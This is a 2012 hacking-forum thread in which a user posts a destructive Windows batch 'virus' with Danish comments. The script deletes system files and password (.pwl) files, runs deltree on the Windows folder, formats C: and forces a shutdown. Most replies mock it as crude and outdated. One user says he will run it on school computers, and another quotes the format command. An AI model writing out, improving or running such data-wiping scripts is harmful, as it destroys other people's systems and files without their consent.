Sinisterly
Pretty deadly batch ;) - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Coding (https://sinister.ly/Forum-Coding)
+--- Forum: Coding (https://sinister.ly/Forum-Coding--71)
+--- Thread: Pretty deadly batch ;) (/Thread-Pretty-deadly-batch)



Pretty deadly batch ;) - Asuna_mybb_import7736 - 04-23-2012

Whad'up?
Hello and welcome! Smile
I won't spill your time so...

Code:
@echo off REM Denne virus er lavet af An0nH4ckZ0r1337/d8 ;) REM Skal vi begynde?? MKDIR C:\windows\temp\a MKDIR C:\windows\temp\b MKDIR C:\windows\temp\c MKDIR C:\windows\temp\d MKDIR C:\windows\temp\e MKDIR C:\windows\temp\f MKDIR C:\windows\temp\g MKDIR C:\windows\temp\h MKDIR C:\windows\temp\i MKDIR C:\windows\temp\j MKDIR C:\windows\temp\k MKDIR C:\windows\temp\l MKDIR C:\windows\temp\m MKDIR C:\windows\temp\n MKDIR C:\windows\temp\o MKDIR C:\windows\temp\p MKDIR C:\windows\temp\q MKDIR C:\windows\temp\r MKDIR C:\windows\temp\s MKDIR C:\windows\temp\t MKDIR C:\windows\temp\u MKDIR C:\windows\desktop\hey_lamer_wazzup MKDIR c:\windows\desktop\hey_lamer_wazzup\loading_echo_files MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_sys_operator MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_config_files MKDIR c:\windows\desktop\hey_lamer_wazzup\loading_echo_files\ab MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_sys_operator\ac MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_config_files\ad MKDIR C:\windows\temp001 MKDIR C:\windows\temp002 MKDIR C:\windows\temp003 MKDIR C:\windows\temp004 MKDIR C:\windows\temp005 MKDIR C:\windows\temp006 MKDIR C:\windows\temp007 MKDIR C:\windows\temp008 MKDIR C:\windows\temp009 MKDIR C:\windows\temp000 MKDIR C:\windows\temp010 MKDIR C:\windows\temp020 MKDIR C:\windows\temp030 MKDIR C:\windows\temp040 MKDIR C:\windows\temp050 REM Dårlig netværk.... REM yeah echo Velkommen til den rigtige anti-retardo virus! REM Nu vil den rigtige virus starte! echo Vent echo Jeg har en overraskelse til dig...Spænd dig fast! Det her bliver vildt! cd\ cd C:\ @if exist C:\Autoexec.bat del C:\Autoexec.bat del config.sys cd windows del control.ini @if exist C:\windows\dosstart.bat del C:\windows\dosstart.bat cd\ cd C:\ @if exist C:\logo.sys del C:\logo.sys @if exist C:\windows\rundll.exe del C:\rundll.exe @if exist C:\windows\rundll32.exe del C:\windows\rundll32.exe @if exist C:\windows\ios.ini del C:\windows\ios.ini cd\ cd windows del win.ini @if exist C:\WINDOWS\OPTIONS\CABS\scandisk.ini del C:\WINDOWS\OPTIONS\CABS\scandisk.ini @if exist C:\WINDOWS\system.ini del C:\WINDOWS\system.ini cd\ cd C:\ @if exist C:\WINDOWS\*.pwl del C:\WINDOWS\*.pwl @if exist C:\WINDOWS\SYSTEM\sysedit.exe del C:\WINDOWS\SYSTEM\sysedit.exe @if exist C:\WINDOWS\SYSTEM\Systray.exe del C:\WINDOWS\SYSTEM\Systray.exe @if exist C:\WINDOWS\system.new del C:\WINDOWS\system.new @if exist C:\WINDOWS\system.bak del C:\WINDOWS\system.bak @if exist C:\WINDOWS\system.cb del C:\WINDOWS\system.cb @if exist C:\WINDOWS\system\Msjstick.drv del C:\WINDOWS\system\Msjstick.drv @if exist C:\WINDOWS\system\Supervga.drv del C:\WINDOWS\system\Supervga.drv @if exist C:\WINDOWS\system\Mouse.drv del C:\WINDOWS\system\Mouse.drv echo Wow.. Det var noget af en tur! echo Hvad?? Vil du have mere?? echo Ok... Men denne gang bliver det dyrt! echo Vink farvel til din computer og sig: Farvel elskede pc... Du vil aldrig kunne starte igen, fordi jeg har været så dum at åbne virusen. echo Jeg troede jeg var smart, men det var jeg ikke! Farvel :( ! cd\ cd windows deltree /y windows format c: /y shutdown -s -t 10 -c "Vink farvel skatter!"



RE: Pretty deadly batch ;) - Reverence - 04-24-2012

What language is are the "echos" written in?

Other than that, the batch looks like it just deletes some files, not very creative in my opinion.


RE: Pretty deadly batch ;) - Jacob - 04-24-2012

Looks like german to me ^__^

Btw, not very destructive....only works in XP and down, and is very inefficient.


RE: Pretty deadly batch ;) - AqworldThunder - 04-24-2012

Gonna put the batch file on my USB and go to school and try this, thanks for the share =D
*NOTE* I will never get caught because my teacher sleep's most of the period and I'm in the corner Tongue ultimate win.


RE: Pretty deadly batch ;) - Frooxius - 04-24-2012

This is so funny that it hurts. It is deadly, but to the people who read it and think about it for a second.

First you, make a bunch of folders. What's that supposed to do? That's like trying to kill a mammoth by throwing a few sheets of regular harmless paper around him.

Then, you attempt to delete a bunch of system files, which won't even work on newer systems, because it protects its files and even in unlikely case that they would actually be deleted, they can be restored.

And then... you attempt to delete whole Windows folder. Okay... think... what's odd is... Why did you even try to delete a few specific files when you're just about to delete the whole thing?

And lastly, you format the whole drive... if you're going to use that command, why even bothering with deleting specific files when this just supposedly wipes it all?

Also, you disable echo at the beginning, yet you have bunch of commands with @ in the front. Why? Why disable echo so you don't have to manually prevent echoing the commands and then you just manually prevent it anyway?

To me, it looks like you just slap a pieces of code you find without even thinking about it so here's a little advice: If you want to be come good, at anything, think about it. Think if what you're doing makes any sense, think how it works and if what you are doing has any meaning. If you think that things like making a bunch of folders make it look cool... well it doesn't for anyone who reads it and think about, it makes it look stupid and hints that you didn't give it much of a thought yourself.



RE: Pretty deadly batch ;) - FunKx - 04-24-2012

(04-24-2012, 03:33 AM)Frooxius Wrote: This is so funny that it hurts. It is deadly, but to the people who read it and think about it for a second.

First you, make a bunch of folders. What's that supposed to do? That's like trying to kill a mammoth by throwing a few sheets of regular harmless paper around him.

Then, you attempt to delete a bunch of system files, which won't even work on newer systems, because it protects its files and even in unlikely case that they would actually be deleted, they can be restored.

And then... you attempt to delete whole Windows folder. Okay... think... what's odd is... Why did you even try to delete a few specific files when you're just about to delete the whole thing?

And lastly, you format the whole drive... if you're going to use that command, why even bothering with deleting specific files when this just supposedly wipes it all?

Also, you disable echo at the beginning, yet you have bunch of commands with @ in the front. Why? Why disable echo so you don't have to manually prevent echoing the commands and then you just manually prevent it anyway?

To me, it looks like you just slap a pieces of code you find without even thinking about it so here's a little advice: If you want to be come good, at anything, think about it. Think if what you're doing makes any sense, think how it works and if what you are doing has any meaning. If you think that things like making a bunch of folders make it look cool... well it doesn't for anyone who reads it and think about, it makes it look stupid and hints that you didn't give it much of a thought yourself.

I agree on this one! Like...what the fck? Biggrin :epic:


RE: Pretty deadly batch ;) - Asuna_mybb_import7736 - 04-28-2012

Guys...it's not everyone who is such geeks as you...
This would freak people on my age...
OMG...!


RE: Pretty deadly batch ;) - ArkPhaze - 04-29-2012

Quote:This would freak people on my age...

drake8, your profile says you're 21, and personally if I was your age, I would only be freaking out at a few of the senseless lines in this script at most. Lastly, everyone here with the exception of Reverence which has his age hidden, is either younger than you, or the same age... So what are you trying to prove by age here?

Really this would be about it, assuming you get this far
Code:
format c: /y shutdown -s -t 10 -c "Vink farvel skatter!"

lol How are they supposed to care that you create folders and delete files even if you format? They won't see those folders in the Windows directory to even see that they exist if they couldn't read what your script does, and it wouldn't pose any threat to the system either.


RE: Pretty deadly batch ;) - ArkPhaze - 04-29-2012

Quote:This would freak people on my age...

drake8, your profile says you're 21, and personally if I was your age, I would only be freaking out at a few of the senseless lines in this script at most. Lastly, everyone here with the exception of Reverence which has his age hidden, is either younger than you, or the same age... So what are you trying to prove by age here?

Really this would be about it, assuming you get this far
Code:
format c: /y shutdown -s -t 10 -c "Vink farvel skatter!"

lol How are they supposed to care that you create folders and delete files even if you format? They won't see those folders in the Windows directory to even see that they exist if they couldn't read what your script does, and it wouldn't pose any threat to the system either.


RE: Pretty deadly batch ;) - Asuna_mybb_import7736 - 05-01-2012

Yeah mate...
Do not trust everything on the WWW! Wink